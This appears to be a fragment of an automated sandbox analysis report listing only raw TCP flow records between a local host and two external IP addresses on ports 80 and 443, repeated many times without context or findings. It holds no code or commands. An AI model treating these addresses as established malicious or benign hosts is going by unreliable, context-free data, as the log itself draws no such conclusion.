                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
